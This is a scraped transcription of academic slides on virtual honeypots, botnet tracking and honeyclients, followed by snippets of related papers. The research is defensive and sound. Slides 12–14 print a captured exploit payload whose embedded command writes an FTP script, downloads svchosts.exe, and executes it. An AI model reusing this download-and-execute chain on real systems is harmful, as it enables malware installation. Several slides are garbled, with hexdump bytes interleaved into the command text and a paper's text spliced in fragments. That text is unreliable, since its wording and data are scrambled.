Virtual Honeypots UNIVERSITÄT MANNHEIM. Know Your Enemy. Pi1 - Laboratory for Dependable Distributed Systems
|
|
- Stephen Knight
- 8 years ago
- Views:
Transcription
1 Virtual Honeypots Know Your Enemy Pi1 - Laboratory for Dependable Distributed Systems
2 Outline Honeypot 101 Examples honeyd nepenthes Honeyclients Conclusion
3 Honeypots Network-based measurements often show us only the results of attacks Scanning activity caused by worms Spam sent via botnets How to learn more about the attackers? A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. Know Your Enemy
4 Honeypots High-interaction Low-interaction Real services, OS s, or applications Emulation of TCP/IP stack, vulnerabilities,... Higher risk Lower risk Hard to deploy / maintain Easy to deploy / maintain Capture extensive amount of information Example: Gen III honeynets Capture quantitative information about attacks Examples: honeyd, nepenthes, labrea,...
5 honeyd Low-interaction honeypot written by Niels Provos Available at Virtualization of TCP/IP stack Fool tools like nmap & xprobe Complex setups possible Latency, packets loss, bandwith,... Can emulate complex network setups
6 honeyd honeyd libnet libpcap Personality engine Userland IP-Stack ICMP UDP Service External Program TCP proxy
7 Malware Collection Hundreds of new malware samples each month How to learn more about malware? Quantitative information Qualitative information Information about new malware Usage of honeypot-based techniques Use deception & emulation
8 nepenthes Tool to automatically collect malware like bots and other autonomous spreading malware Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities Available at
9 Schematic Overview
10 Vulnerability modules Emulate vulnerable services vuln-lsass vuln-dcom downloadtftp submitpostgres } vuln-... } vulnms06070 vulnarcserve Play with exploits downloadhtthttp until they submit-send us their payload (finite state machine) shellcodegeneric Currently more than 20 available shellemuwinnt downloadcsend vulnerability modules submit-file downloadlinnorman submit- shellcodesignatures More in development download- Analysis of known vulnerabilities submit-... &... exploits necessary } } exploit payload URI binary Automation possible?
11 Shellcode modules compromised machine http Generic downloadlinnorman XOR decoder submit- sch_generic_createprocess downloadsubmit sch_generic_url sch_generic_cmd submitpostgres submit-file shellcodegeneric shellemuwinnt shellcodesignatures Automatically extract URL used by malware download-to transfer submit- itself to http downloadtftp downloadcsend sch_generic_xor } } ad URI binary
12 Payload received after successfull emulation [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x AAAAAAAA AAAAAAAA [ dia ] 0x c a #..W.....B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x c 8b 7c ef 8b 4f 18 8b 5f eb E<..x...O.._.. [ dia ] 0x0490 e3 2e 49 8b 34 8b 01 ee 31 c0 99 ac 84 c I t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 1c 8b 01 eb..f..k._... [ dia ] 0x04c0 89 5c c3 31 c0 64 8b c0 78 0f 8b.\$..1.d.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ef ce e fe 8a 0e 57 ff e7 e8 ee ff h...`h....w... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op [ dia ] 0x e e e e en [ dia ] 0x e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB
13 Payload received after successfull emulation [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x0450 cmd /c AAAAAAAA AAAAAAAA [ dia ] 0x echo open 0c a >> 42 ii 90..#..W.. &...B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x echo 3c 8b 7c user a ef a 8b 4f 18 8b 5f 20 >> 01 ii eb E<..x.. &.O.._.. [ dia ] 0x0490 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c0 >> 74 ii 07..I.4... & 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 8b >> 01 ii eb..f..k._ &... [ dia ] 0x04c0 89 echo 5c bye c3 31 c0 64 8b c0 78 >> 0f ii 8b.\$..1.d &.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ftp ef ce -n e0 60 -v 68 -s:ii 98 fe 8a 0e 57 ff e7 e8 ee ff h...`h.. &..W... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op del ii & [ dia ] 0x e e e e en [ dia ] 0x svchosts.exe e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB
14 Payload received after successfull emulation [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x0450 cmd /c AAAAAAAA AAAAAAAA [ dia ] 0x echo open 0c a >> 42 ii 90..#..W.. &...B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x echo 3c 8b 7c user a ef a 8b 4f 18 8b 5f 20 >> 01 ii eb E<..x.. &.O.._.. [ dia ] 0x0490 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c0 >> 74 ii 07..I.4... & 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 8b >> 01 ii eb..f..k._ &... [ dia ] 0x04c0 89 echo 5c bye c3 31 c0 64 8b c0 78 >> 0f ii 8b.\$..1.d &.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ftp ef ce -n e0 60 -v 68 -s:ii 98 fe 8a 0e 57 ff e7 e8 ee ff h...`h.. &..W... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op del ii & [ dia ] 0x e e e e en [ dia ] 0x svchosts.exe e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x0550 ftp://a:a@ /svchosts.exe f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB
15 Download modules download-{http,tftp} downloadhttp submit- http Handles HTTP / TFTP URIs downloadtftp submitpostgres download-ftp downloadcsend FTP client from Windows is not submit-file } URI downloadlink download-... } binary RFC compliant... submitnorman download-{csend,creceive} submit-... download-link link:// /hj4g==
16 Submission modules submit-file } binary submitpostgres submithttp submitnorman submit-file submit-... Write file to hard disk submit-{mysql,postgres,mssql} Store file in database submit-norman Submit file to sandboxes for analysis submit-http Send file via HTTP POST
17 CWSandbox
18 Statistics: nepenthes Eight weeks (December 06/January 07) nepenthes on ~8,000 IP addresses on one physical machine: 13,000,000+ files downloaded 2,600+ unique binaries based on md5sum ~300 different botnets Anti-virus engines detect between 70% and 90% of the binaries Complete set (2,634 samples) AV 1 AV 2 AV 3 AV One bot variant dominates the collection
19 Statistics
20 Tracking Botnets Learning more about botnets with honeypots 1. Collect samples with honeypots 2. Automated analysis, e.g., cwsandbox.org 3. Join botnet and observe from inside Know Your Enemy: Tracking Botnets LEET 08: Measurements and Mitigation of P2Pbased Botnets: A Case Study on Storm Worm
21 Spam Mails 29/08 02/09 04/09 13/09 16/09 18/09 22/09 25/09 27/09 14/10 01/09 03/09 09/09 14/09 17/09 21/09 23/09 26/09 28/09 S tocks Money Kitty Halloween 19/10 22/10 27/10 29/10 08/11 11/11 14/11 16/11 20/11 22/11 21/10 23/10 28/10 07/11 10/11 12/11 15/11 18/11 21/ S tocks J obs Chris tmas Newyear Spam mails sent by one infected Newyear (x) Pharma (x) Valentine (x) Storm machine over several days 7500
22
23 Inside Storm Network-level behavior First versions: Overnet (Kademlia-based DHT) Obfuscation was added in October 2007 Called Stormnet in the following Seems to change from DHT to linked list Only bots present in Stormnet
24 Inside Storm Bot communication (simplified, valid for Overnet) Infected machine searches for specific keys within the network Botmaster knows in advance which keys are searched for publishes commands there rendezvous points
25 Key Search
26 Key Search
27 Modes 3.9 Überblick Two different modes: NAT or public IP address Spam/DoS- Bots Gateways Controller TCP und Overnet HTTP Actually Storm Worm is hybrid network with P2P component for lookup
28 Results (a) Wachstum von Stormnet im Dezember. Mit Beginn der Weihnachtskampagne zur Verbreitung am beginnt auch das Botnetz zu wachsen. Die Y-Achse spiegelt die Anzahl (in Tausend) der verschiedenen IP-Adressen pro halbe Stunde wieder. Thousands of bots in Stormnet for US Anzahl Peers in : : : : : : : : :30 Datum : :30 (b) Vergrößerter Ausschnitt von 4.8a. Die Tagesschwankungen unterliegen einem festen Rhythmus. Diurnal pattern in Stormnet size bbildung 4.8: Wachstum des Botnetzes im Dezember. Die Daten wurden freundlicherweise von Moritz Steiner zur Verfügung gestellt.
29 Results US IN -- TR stormbots date Number of bots in Stormnet, split by geo-location
30 Honeyclients Tracking New Attack Vectors
31 Malicious Websites More and more attacks against browsers Operating systems get better and better Applications become weakest link in chain Drive-by download to install malware Malicious website sends several exploits to visitor (typically encoded, not easy to detect) If one exploit is successful, malware is installed
32 Malicious Websites Social engineering is also common Trick user into downloading executable Often related to greeting cards or adult content Examples: Storm Worm and Zlob Malicious results in search engines Attackers place sites within Google s search index requests return these malicious sites ~1-2 % of search results are malicious
33 Malicious Websites Analyzed several billion URLs and executed an onducted over a period of twelve months Our results reveal several attack stratepages into malware infection vectors. erent aspects of content control responowser exploitation: advertising, thirdcontributed content and web server selysis and examples, 4.5M we URLs show how each an be used to exploit web browsers. re interested in examining how malware browser vulnerabilities to install itself in-depth analysis of Found malicious sites Virtual Machine Web Page Repository MapReduce Heuristical URL Extraction Monitor Execution Analysis. In addition, we evaluate trends from Internet alicious web pages. We show the disbinaries across Explorer downloading different sites overa time. binary Result a on the evolution of malware binaries s obfuscation to techniques honeypot, used to make Malicious Page lt to reverse engineer. Repository this paperadditional is organized as follows: malicious in s related work. Section 3 provides an sites Figure 1: This diagram shows an overview of our detectio anism for automatic detection of maliion 4, we discuss how different types of execution in a virtual machine if the URL exhibits malicious be tecture. We heuristically select candidate URLs and determ adversaries to place exploits on thirdd show different techniques for exploit- Provos et al., The Ghost in the Browser: ior Analysis of theof installed Web-based software Malware but- rather HotBots 07 identify the m nisms used to introduce the software into the system v Thorsten gainingholz control Laboratory overfor a user s Dependable computer Distributed Systems Troopers 2008 URL
34 Social Engineering
35 Social Engineering
36 Backends
37 Backends
38 Honeyclients Automatically search for malicious websites Simulate browsing behavior Closely observe system and detect anomalies HoneyMonkey (NDSS 06), Capture-HPC, HoneyC, HoneyClient, phoneyc,... Can be generalized to learn more about attacks against all kinds of client applications User simulation needed?
39 Honeyclients Capture-HPC ( capture-hpc) Client/Server model Analyze website with IE or other browser
40 Honeyclients Capture-HPC ( capture-hpc) Client/Server model Analyze website with IE or other browser " :27:44","visiting"," " :28:35","error0:NETWORK_ERROR ", " " :29:35","visiting"," " :30:33","error0:NETWORK_ERROR-404", " " :31:29","visiting"," " :32:04","error0:NETWORK_ERROR ", " " :55:00","visiting"," " :56:00","visited"," " :57:15","visiting"," " :58:45","visited","
41 " :41:14","malicious"," " :42:53","malicious"," " :44:03","malicious"," Honeyclients Capture-HPC ( Abbildung 5: Ausschnitt aus malicious.log capture-hpc) Client/Server model Analyze website with IE or other browser " :27:44","visiting"," Ergebnisse Sämtliche URLs die abgearbeitet wurden, wurden als malicious eingestuft. Da nur URLs untersucht wurden, die auf Blacklisten stehen, überrascht das Ergebnis zunächst nicht. Allerdings waren einige Webseiten zum Zeitpunkt der Untersuchung bereits offline, was " :28:35","error0:NETWORK_ERROR ", " " :29:35","visiting"," " :30:33","error0:NETWORK_ERROR-404", " " :31:29","visiting"," " :32:04","error0:NETWORK_ERROR ", " " :55:00","visiting"," " :56:00","visited"," " :57:15","visiting"," " :58:45","visited"," "file","24/3/ :37:56.717", "C:\Programme\Internet Explorer\iexplore.exe","Write","C:\syst.exe" "file","24/3/ :37:56.702", "System","Write","C:\WINDOWS\Temp\dnlsvc.exe" "file","24/3/ :37:57.452", "System","Write","C:\syst.exe" "process","24/3/ :37:57.733", "C:\Programme\Internet Explorer\iexplore.exe","created","C:\syst.exe" Abbildung 6: Beispiel für erfolgreiche Kompromittierung des Honeyclients
42 Conclusion Current honeypots are good at finding known attacks / automated attacks We can detect worms, botnets, and other automated threats Finding 0-day / targeted attacks is harder Why should an attacker waste his 0-day on my honeypot? How to trick a clever attacker?
43 Security Thorsten Holz breakthrough solution. Virtual honeypots share many attributes of traditional honeypots, but you can run thousands of them on a single system making them easier and cheaper to build, deploy, and maintain. In this hands-on, highly accessible book, two leading honeypot pioneers systematically introduce virtual honeypot technology. thorsten.holz@informatik.uni-mannheim.de VIRTUAL HONEYPOTS Honeypots have demonstrated immense value in Internet security, but physical honeypot deployment can be prohibitively complex, time-consuming, and expensive. Now, there s a One step at a time, you ll learn exactly how to implement, configure, use, and maintain virtual honeypots in your own environment, even if you ve never deployed a honeypot before. You ll learn through examples, including Honeyd, the acclaimed virtual honeypot created by coauthor Niels Provos. The authors also present multiple real-world applications for virtual honeypots, including network decoy, worm detection, spam prevention, and network simulation. After reading this book, you will be able to Compare high-interaction honeypots that provide real systems and services and the low-interaction honeypots that emulate them More information: Install and configure Honeyd to simulate multiple operating systems, services, and network environments Use virtual honeypots to capture worms, bots, and other malware Create high-performance hybrid honeypots that draw on technologies from both low- and high-interaction honeypots Implement client honeypots that actively seek out dangerous Internet locations Understand how attackers identify and circumvent honeypots Analyze the botnets your honeypot identifies, and the malware it captures Preview the future evolution of both virtual and physical honeypots AUTHORS Provos and Holz have written the book that the bad guys don't want you to read. Virtual Honeypots is a must-read and belongs on the bookshelf of anyone who is serious about security. Aviel D. Rubin, Ph.D., Johns Hopkins University Niels Provos is a senior staff engineer at Google. He developed Honeyd, an open source virtual honeypot that won the Tops in Innovation award from Network World and is one of the cocreators of OpenSSH. Provos holds a Degree in mathematics from the University of Hamburg and a Ph.D. in computer science and engineering from the University of Michigan. Thorsten Holz is a Ph.D. student at the Laboratory for Dependable Distributed Systems at the University of Mannheim, Germany. He is one of the founders of the German Honeynet Project and a member of the Steering Committee of the Honeynet Research Alliance. He regularly blogs at VIRTUAL HONEYPOTS P R O V O S H O L Z Virtual Honeypots is the best reference for honeypots today. Security experts Niels Provos and Thorsten Holz cover a large breadth of cutting-edge topics, from low-interaction honeypots to botnets and malware. If you want to learn about the latest types of honeypots, how they work and what they can do for you, this is the resource you need. Lance Spitzner, Founder, Honeynet Project VIRTUAL HONEYPOTS From Botnet Tracking to Intrusion Detection Cover design by Chuti Prasertsith Cover photograph by Ryan McVay/Stone/Getty Images, Inc. Text printed on recycled paper Includes FREE 45-Day Online Edition ISBN-13: ISBN-10: $49.99 U.S./$61.99 CANADA NIEL S PROVOS THORS TEN HOLZ Pi1 - Laboratory for Dependable Distributed Systems
Honeypots UNIVERSITÄT MANNHEIM. A quick overview. Pi1 - Laboratory for Dependable Distributed Systems
Honeypots A quick overview Pi1 - Laboratory for Dependable Distributed Systems Outline Motivation High-interaction vs. low-interaction honeypots Gen III honeynets honeyd nepenthes Examples Intro We see
More informationTowards Automated Botnet Detection and Mitigation
Towards Automated Botnet Detection and Mitigation Stopping the Root Cause of Spam Pi1 - Laboratory for Dependable Distributed Systems Outline Motivation Tools & techniques for botnet detection nepenthes
More informationHONEYPOT SECURITY. February 2008. The Government of the Hong Kong Special Administrative Region
HONEYPOT SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without
More informationDISTRIBUTED LOW-INTERACTION HONEYPOT SYSTEM TO DETECT BOTNETS
DISTRIBUTED LOW-INTERACTION HONEYPOT SYSTEM TO DETECT BOTNETS GONG JIAN 2 jgong@njnet.edu.cn Jiangsu Key Laboratory of Computer Networking Technology, China, Nanjing, Southeast University AHMAD JAKALAN
More informationAdaptability of IRC Botnet Detection Method to P2P Botnet Detection
Adaptability of IRC Botnet Detection Method to P2P Botnet Detection Ji, Yuan Department of Electrical Engineering and Computer Science University of California, Irvine yji1@uci.edu John, Robin Department
More informationDynamic Honeypot Construction
Dynamic Honeypot Construction 2nd Annual Alaska Information Assurance Workshop Christopher Hecker U. of Alaska, Fairbanks 9-5-2006 Presentation l Brief Introduction l Project Overview l Future Work l References
More informationTaxonomy of Hybrid Honeypots
2011 International Conference on Network and Electronics Engineering IPCSIT vol.11 (2011) (2011) IACSIT Press, Singapore Taxonomy of Hybrid Honeypots Hamid Mohammadzadeh.e.n 1, Masood Mansoori 2 and Roza
More informationLASTLINE WHITEPAPER. Large-Scale Detection of Malicious Web Pages
LASTLINE WHITEPAPER Large-Scale Detection of Malicious Web Pages Abstract Malicious web pages that host drive-by-download exploits have become a popular means for compromising hosts on the Internet and,
More informationThe Nepenthes Platform: An Efficient Approach to Collect Malware
The Nepenthes Platform: An Efficient Approach to Collect Malware Paul Baecher 1, Markus Koetter 1,ThorstenHolz 2, Maximillian Dornseif 2, and Felix Freiling 2 1 Nepenthes Development Team nepenthesdev@gmail.com
More informationProject Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology Project Proposal 1 Project Proposal 2 Abstract Honeypot systems are readily used by organizations large and
More informationSecond-generation (GenII) honeypots
Second-generation (GenII) honeypots Bojan Zdrnja CompSci 725, University of Auckland, Oct 2004. b.zdrnja@auckland.ac.nz Abstract Honeypots are security resources which trap malicious activities, so they
More informationAgenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka
Taxonomy of Botnet Threats Trend Micro Inc. Presented by Tushar Ranka Agenda Summary Background Taxonomy Attacking Behavior Command & Control Rallying Mechanisms Communication Protocols Evasion Techniques
More informationHoneypots and Honeynets Technologies
New Mexico State University Honeypots and Honeynets Technologies Hussein Al-Azzawi Final Paper CS 579 Special Topics / Computer Security Nov. 27, 2011 Supervised by Mr. Ivan Strnad Table of contents: 1.
More informationThe Honeynet Project: Data Collection Tools, Infrastructure, Archives and Analysis
The Honeynet Project: Data Collection Tools, Infrastructure, Archives and Analysis David Watson The UK Honeynet Project Chapter david@honeynet.org.uk Jamie Riden The UK Honeynet Project Chapter jamie@honeynet.org.uk
More informationUSE HONEYPOTS TO KNOW YOUR ENEMIES
USE HONEYPOTS TO KNOW YOUR ENEMIES SHERIF MOUSA (EG-CERT) 9 MAY 2012 WHAT ARE WE GOING TO TALK ABOUT? What exactly happens on the end of your Internet connection. Open Source tools to set up your own Honeypot
More informationKeywords Intrusion detection system, honeypots, attacker, security. 7 P a g e
HONEYPOTS IN NETWORK SECURITY Abhishek Sharma Research Scholar Department of Computer Science and Engineering Lovely Professional University (Punjab) - India Abstract Computer Network and Internet is growing
More informationDaniel Meier & Stefan Badertscher
Daniel Meier & Stefan Badertscher 1. The definition of Honeypots 2. Types of Honeypots 3. Strength and Weaknesses 4. Honeypots in action 5. Conclusions 6. Questions 7. Discussion A honeypot is an information
More informationdetection AT R W T H A A C H E N U N I V E R S I T Y, W I T H J A N G Ö B E L, J E N S H E K T O R, A N D T H O R S T E N H O L Z
J A N G Ö B E L, J E N S H E K T O R, A N D T H O R S T E N H O L Z advanced honeypot-based intrusion detection Jan Göbel has an M.Sc.in computer science from RWTH Aachen University and wrote his diploma
More informationSecuring the system using honeypot in cloud computing environment
Volume: 2, Issue: 4, 172-176 April 2015 www.allsubjectjournal.com e-issn: 2349-4182 p-issn: 2349-5979 Impact Factor: 3.762 M. Phil Research Scholar, Department of Computer Science Vivekanandha College
More informationSECURING APACHE : DOS & DDOS ATTACKS - II
SECURING APACHE : DOS & DDOS ATTACKS - II How DDoS attacks are performed A DDoS attack has to be carefully prepared by the attackers. They first recruit the zombie army, by looking for vulnerable machines,
More informationDETECTING AND ANALYZING NETWORK ATTACKS USING VIRTUAL HONEYNET NUR ATIQAH BT. HASAN 2003470954
DETECTING AND ANALYZING NETWORK ATTACKS USING VIRTUAL HONEYNET By NUR ATIQAH BT. HASAN 2003470954 In partial fulfillment of requirement for the BACHELOR OF SCIENCE (Hons.) IN DATA COMMUNICATION AND NETWORKING
More informationLASTLINE WHITEPAPER. The Holy Grail: Automatically Identifying Command and Control Connections from Bot Traffic
LASTLINE WHITEPAPER The Holy Grail: Automatically Identifying Command and Control Connections from Bot Traffic Abstract A distinguishing characteristic of bots is their ability to establish a command and
More informationISA 674 Intrusion Detection
ISA 674 Intrusion Detection Inviting the attacker to come to you: HoneyPots & HoneyClients! Angelos Stavrou, George Mason University! Honeypots Honeypots are real or emulated vulnerable systems ready to
More informationVolume 2, Issue 3, March 2014 International Journal of Advance Research in Computer Science and Management Studies
Volume 2, Issue 3, March 2014 International Journal of Advance Research in Computer Science and Management Studies Research Article / Paper / Case Study Available online at: www.ijarcsms.com Web Application
More informationCapturing Web Application Threats Using virtual CMS Honeypot. Saharuddin Saat, Nor Adora Endut 1, Abdul Hamid Othman 2
Capturing Web Application Threats Using virtual CMS Honeypot Saharuddin Saat, Nor Adora Endut 1, Abdul Hamid Othman 2 Faculty of Computer and Mathematical Sciences, Universiti Teknologi MARA, Malaysia
More informationContents. vii. Preface. P ART I THE HONEYNET 1 Chapter 1 The Beginning 3. Chapter 2 Honeypots 17. xix
Honeynet2_bookTOC.fm Page vii Monday, May 3, 2004 12:00 PM Contents Preface Foreword xix xxvii P ART I THE HONEYNET 1 Chapter 1 The Beginning 3 The Honeynet Project 3 The Information Security Environment
More informationTowards Proactive Spam Filtering (Extended Abstract)
Towards Proactive Spam Filtering (Extended Abstract) Jan Göbel Thorsten Holz Philipp Trinius {goebel holz trinius}@informatik.uni-mannheim.de Laboratory for Dependable Distributed Systems University of
More informationMultifaceted Approach to Understanding the Botnet Phenomenon
Multifaceted Approach to Understanding the Botnet Phenomenon Christos P. Margiolas University of Crete A brief presentation for the paper: Multifaceted Approach to Understanding the Botnet Phenomenon Basic
More informationIntegrated Approach to Network Security. Lee Klarich Senior Vice President, Product Management March 2013
Integrated Approach to Network Security Lee Klarich Senior Vice President, Product Management March 2013 Real data from actual networks 2 2012, Palo Alto Networks. Confidential and Proprietary. 2008: HTTP,
More informationUse of Honeypots to Increase Awareness regarding Network Security
Use of Honeypots to Increase Awareness regarding Network Security Bhumika, Vivek Sharma Abstract Honeypots are closely monitored decoys that are employed in a network to study the trail of hackers and
More informationHow to build and use a Honeypot. Ralph Edward Sutton, Jr. DTEC 6873 Section 01
How to build and use a Honeypot By Ralph Edward Sutton, Jr DTEC 6873 Section 01 Abstract Everybody has gotten hacked one way or another when dealing with computers. When I ran across the idea of a honeypot
More informationDetecting Bots with Automatically Generated Network Signatures
Detecting Bots with Automatically Generated Network Signatures Peter Wurzinger, Leyla Bilge, Thorsten Holz, Jan Goebel, Christopher Kruegel, Engin Kirda,, {pw,tho}@seclab.tuwien.ac.at Institute Eurecom,
More informationNetworking for Caribbean Development
Networking for Caribbean Development BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n o g. o r g N E T W O R K I N G F O R C A R I B B E A N D E V E L O P M E N T BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n
More informationUse of Honeypot and IP Tracing Mechanism for Prevention of DDOS Attack
Use of Honeypot and IP Tracing Mechanism for Prevention of DDOS Attack Shantanu Shukla 1, Sonal Sinha 2 1 Pranveer Singh Institute of Technology, Kanpur, Uttar Pradesh, India 2 Assistant Professor, Pranveer
More informationE-government security: A honeynet approach
E-government security: A honeynet approach 1 Bahman Nikkhahan, 2 Akbar Jangi Aghdam, and 3 Sahar Sohrabi 1 K. N. Toosi University of Technology of Iran, bahman616@gmail.com 2 Iran University of Science
More informationHoneypot as the Intruder Detection System
Honeypot as the Intruder Detection System DAVID MALANIK, LUKAS KOURIL Department of Informatics and Artificial Intelligence Faculty of Applied Informatics, Tomas Bata University in Zlin nam. T. G. Masaryka
More informationAnti-Malware Technologies
: Trend of Network Security Technologies Anti-Malware Technologies Mitsutaka Itoh, Takeo Hariu, Naoto Tanimoto, Makoto Iwamura, Takeshi Yagi, Yuhei Kawakoya, Kazufumi Aoki, Mitsuaki Akiyama, and Shinta
More informationChapter 9 Firewalls and Intrusion Prevention Systems
Chapter 9 Firewalls and Intrusion Prevention Systems connectivity is essential However it creates a threat Effective means of protecting LANs Inserted between the premises network and the to establish
More informationBOTNETS. Douwe Leguit, Manager Knowledge Center GOVCERT.NL
BOTNETS Douwe Leguit, Manager Knowledge Center GOVCERT.NL Agenda Bots: what is it What is its habitat How does it spread What are its habits Dutch cases Ongoing developments Visibility of malware vs malicious
More informationLASTLINE WHITEPAPER. Using Passive DNS Analysis to Automatically Detect Malicious Domains
LASTLINE WHITEPAPER Using Passive DNS Analysis to Automatically Detect Malicious Domains Abstract The domain name service (DNS) plays an important role in the operation of the Internet, providing a two-way
More informationMedium Interaction Honeypots
Medium Interaction Honeypots Georg Wicherski April 7, 2006 Abstract Autonomously spreading malware has been a global threat to the Internet Community ever since the existence of the Internet as a large-scale
More informationRIA SECURITY TECHNOLOGY
RIA SECURITY TECHNOLOGY Ulysses Wang Security Researcher, Websense Hermes Li Security Researcher, Websense 2009 Websense, Inc. All rights reserved. Agenda RIA Introduction Flash Security Attack Vectors
More informationFighting Advanced Threats
Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.
More informationAdvanced Honeypot Architecture for Network Threats Quantification
Advanced Honeypot Architecture for Network Threats Quantification Mr. Susheel George Joseph M.C.A, M.Tech, M.Phil(CS) (Associate Professor, Department of M.C.A, Kristu Jyoti College of Management and Technology,
More informationDetecting peer-to-peer botnets
Detecting peer-to-peer botnets Reinier Schoof & Ralph Koning System and Network Engineering University of Amsterdam mail: reinier.schoof@os3.nl, ralph.koning@os3.nl February 4, 2007 1 Introduction Spam,
More informationTe Whare Wananga o te Upoko o te Ika a Maui. Computer Science
VICTORIA UNIVERSITY ÎÍÏ OF WELLINGTON Te Whare Wananga o te Upoko o te Ika a Maui School of Mathematical and Computing Sciences Computer Science PO Box 600 Wellington New Zealand Tel: +64 4 463 5341, Fax:
More informationCS 356 Lecture 19 and 20 Firewalls and Intrusion Prevention. Spring 2013
CS 356 Lecture 19 and 20 Firewalls and Intrusion Prevention Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access
More informationIntroducing IBM s Advanced Threat Protection Platform
Introducing IBM s Advanced Threat Protection Platform Introducing IBM s Extensible Approach to Threat Prevention Paul Kaspian Senior Product Marketing Manager IBM Security Systems 1 IBM NDA 2012 Only IBM
More informationWeb Application Worms & Browser Insecurity
Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys
More informationThe HoneyNet Project Scan Of The Month Scan 27
The HoneyNet Project Scan Of The Month Scan 27 23 rd April 2003 Shomiron Das Gupta shomiron@lycos.co.uk 1.0 Scope This month's challenge is a Windows challenge suitable for both beginning and intermediate
More informationCIT 480: Securing Computer Systems. Incident Response and Honeypots
CIT 480: Securing Computer Systems Incident Response and Honeypots Incident Response What is an Incident? Phases of Incident Response 1. Preparation 2. Identification 3. Containment 4. Damage Assessment
More information[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
